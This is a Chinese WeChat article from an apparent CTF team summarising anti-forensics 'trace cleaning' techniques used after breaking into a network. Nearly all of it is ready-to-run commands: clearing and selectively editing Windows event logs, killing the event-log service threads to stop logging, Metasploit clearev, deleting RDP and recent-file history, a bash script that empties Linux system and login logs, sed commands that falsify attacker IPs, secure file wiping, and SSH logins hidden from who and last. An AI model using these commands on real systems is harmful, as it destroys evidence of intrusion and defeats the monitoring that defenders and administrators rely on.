原创 思源湖的鱼 红客突击队
微信号 Xctfcommando
功能介绍 红客突击队成立于2019年,致力于打造一流国际战队。红客突击队建队至今人流约三百。现正式队员约三十人,分队预备队员约六十人。战队成员涵盖双一流院校研究生与高校专业性人才。红客突击队参加各种国际网络安全竞赛,曾于赛时排名国际38。
__
收录于话题
目录
前言
一、Windows
1、常见日志
2、Windows日志清除
(1)wevtutil.exe
(2)NSA DanderSpiritz
3、绕过Windows日志
(1)方法1
(2)方法2
4、Metasploit
5、3389登陆记录清除
6、清除recent
二、Linux
1、清除命令历史记录
2、在隐蔽的位置执行命令
3、日志文件
4、文件删除
(1)shred命令
(2)dd命令
(3)wipe
(4)Secure-Delete
5、隐藏远程SSH登陆记录
结语
前言
本文学习并小结下痕迹清理方法
一、Windows
1、常见日志
应用程序日志文件:%systemroot%\system32\config\AppEvent.EVT;安全日志文件:%systemroot%\system32\config\SecEvent.EVT;系统日志文件:%systemroot%\system32\config\SysEvent.EVT;DNS日志默认位置:%sys temroot%\system32\config,默认文件大小512KBInternet信息服务FTP日志默认位置:%systemroot%\system32\logfiles\msftpsvc1\,默认每天一个日志;Internet信息服务WWW日志默认位置:%systemroot%\system32\logfiles\w3svc1\,默认每天一个日志;Scheduler服务日志默认位置:%sys temroot%\schedlgu.txt;
以上日志在注册表里的键:
应用程序日志,安全日志,系统日志,DNS服务器日志,它们这些LOG文件在注册表中的:HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog
有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表,里面可查到以上日志的定位目录。
Schedluler服务日志在注册表中HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
2、Windows日志清除
参考:渗透技巧——Windows日志的删除与绕过
支持系统:Win7及以上
获取日志分类列表:
wevtutil el >1.txt
获取单个日志类别的统计信息:
wevtutil gli "windows powershell"
查看指定日志的具体内容:
wevtutil qe /f:text "windows powershell"
删除单个日志类别的所有信息:
wevtutil cl "windows powershell"
(2)NSA DanderSpiritz
参考:NSA DanderSpiritz测试指南——木马生成与测试
统计日志列表,查询所有日志信息,包含时间,数目
eventlogquery -log Application
查看指定类别的日志内容
eventlogfilter -log Application -num 10
删除该类日志所有内容
eventlogclear -log Application
删除单条内容
eventlogedit -log Application -record 1
3、绕过Windows日志
绕过原理:
Windows日志对应于eventlog服务,找到该服务对应的进程svchost.exe,进而筛选出svchost.exe进程中具体实现日志功能的线程,调用TerminateThread结束线程,破坏日志记录功能
特别的地方:
由于只结束了实现日志功能的线程,所以Windows Event Log服务没有被破坏,状态仍为正在运行
(1)方法1
定位eventlog服务对应进程svchost.exe的pid
遍历该进程中的所有线程
判断线程是否满足条件
Windows Event Log 服务需要调用wevtsvc.dll,完整路径为%WinDir%\System32\wevtsvc.dll
并且,如果线程调用了wevtsvc.dll,就可以判读该线程实现了日志记录功能
结束线程
使用TerminateThread
恢复方法
结束进程svchost.exe
重新开启Windows Event Log 服务:net start eventlog
工具:https://github.com/hlldz/Phant0m
(2)方法2
定位eventlog服务对应进程svchost.exe的pid
Get-WmiObject -Class win32_service -Filter "name = 'eventlog'" | select -exp ProcessId
找到svchost.exe的pid为7008
遍历该进程中的所有线程
使用PsList:pslist.exe /accepteula -d 7008
获取进程svchost.exe中的所有线程
判断线程是否满足条件
获取线程对应的服务,如果为eventlog,则满足条件
使用工具:ScTagQuery:sctagqry.exe -t 7928
根据返回的结果Service Tag,判断线程对应的服务
找到对应eventlog的线程
结束线程
调用TerminateThread
工具:https://github.com/3gstudent/Windows-EventLog-Bypass
4、Metasploit
run clearlogs clearev #清除windows中的应用程序日志、系统日志、安全日志
5、3389登陆记录清除
@echo off@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f@del "%USERPROFILE%\My Documents\Default.rdp" /a@exit
6、清除recent
在文件资源管理器中点击“查看”->“选项”->在常规->隐私中点击”清除”按钮
或直接打开C:\Users\Administrator\Recent并删除所有内容
或在命令行中输入del /f /s /q “%userprofile%\Recent*.*
二、Linux
1、清除命令历史记录
histroy -r #删除当前会话历史记录history -c #删除内存中的所有命令历史rm .bash_history #删除历史文件中的内容HISTZISE=0 #通过设置历史命令条数来清除所有历史记录
2、在隐蔽的位置执行命令
使用vim打开文件执行命令
:set history=0:!command
3、日志文件
/var/run/utmp 记录现在登入的用户/var/log/wtmp 记录用户所有的登入和登出/var/log/lastlog 记录每一个用户最后登入时间/var/log/btmp 记录错误的登入尝试/var/log/auth.log 需要身份确认的操作/var/log/secure 记录安全相关的日志信息/var/log/maillog 记录邮件相关的日志信息/var/log/message 记录系统启动后的信息和错误日志/var/log/cron 记录定时任务相关的日志信息/var/log/spooler 记录UUCP和news设备相关的日志信息/var/log/boot.log 记录守护进程启动和停止相关的日志消息
完全删除日志
cat /dev/null > filename: > filename> filenameecho "" > filenameecho > filename
针对性删除日志文件:
删除当天日志sed -i '/当天日期/'d filename
篡改日志
将所有170.170.64.17ip替换为127.0.0.1sed -i 's/170.170.64.17/127.0.0.1/g'
一键清除的bash脚本
#!/usr/bin/bashecho > /var/log/syslogecho > /var/log/messagesecho > /var/log/httpd/access_logecho > /var/log/httpd/error_logecho > /var/log/xferlogecho > /var/log/secureecho > /var/log/auth.logecho > /var/log/user.logecho > /var/log/wtmpecho > /var/log/lastlogecho > /var/log/btmpecho > /var/run/utmprm ~/./bash_historyhistory -c
4、文件删除
(1)shred命令
实现安全的从硬盘上擦除数据,默认覆盖3次,通过 -n指定数据覆盖次数
shred -f -u -z -v -n 8 1.txt
(2)dd命令
可用于安全地清除硬盘或者分区的内容。
dd if=/dev/zero of=要删除的文件 bs=大小 count=写入的次数
(3)wipe
Wipe 使用特殊的模式来重复地写文件,从磁性介质中安全擦除文件。
wipe filename
(4)Secure-Delete
Secure-Delete 是一组工具集合,提供srm、smem、sfill、sswap,4个安全删除文件的命令行工具。
srm filename
sfill filename
sswap /dev/sda1
smem
5、隐藏远程SSH登陆记录
隐身登录系统,不会被w、who、last等指令检测到
ssh -T root@192.168.0.1 /bin/bash -i
不记录ssh公钥在本地.ssh目录中
ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i
结语
小结下常见的痕迹清理方法
预览时标签不可点
收录于话题 #
个 __
上一篇 下一篇
阅读
分享 收藏
赞 在看
____已同步到看一看写下你的想法
前往“发现”-“看一看”浏览“朋友在看”
前往看一看
看一看入口已关闭
在“设置”-“通用”-“发现页管理”打开“看一看”入口
我知道了
__
已发送
取消 __
发送
内网渗透系列:痕迹清理方法小结
最多200字,当前共字
__
发送中
写下你的留言
微信扫一扫
关注该公众号
微信扫一扫
使用小程序
取消 允许
取消 允许
知道了
长按识别前往小程序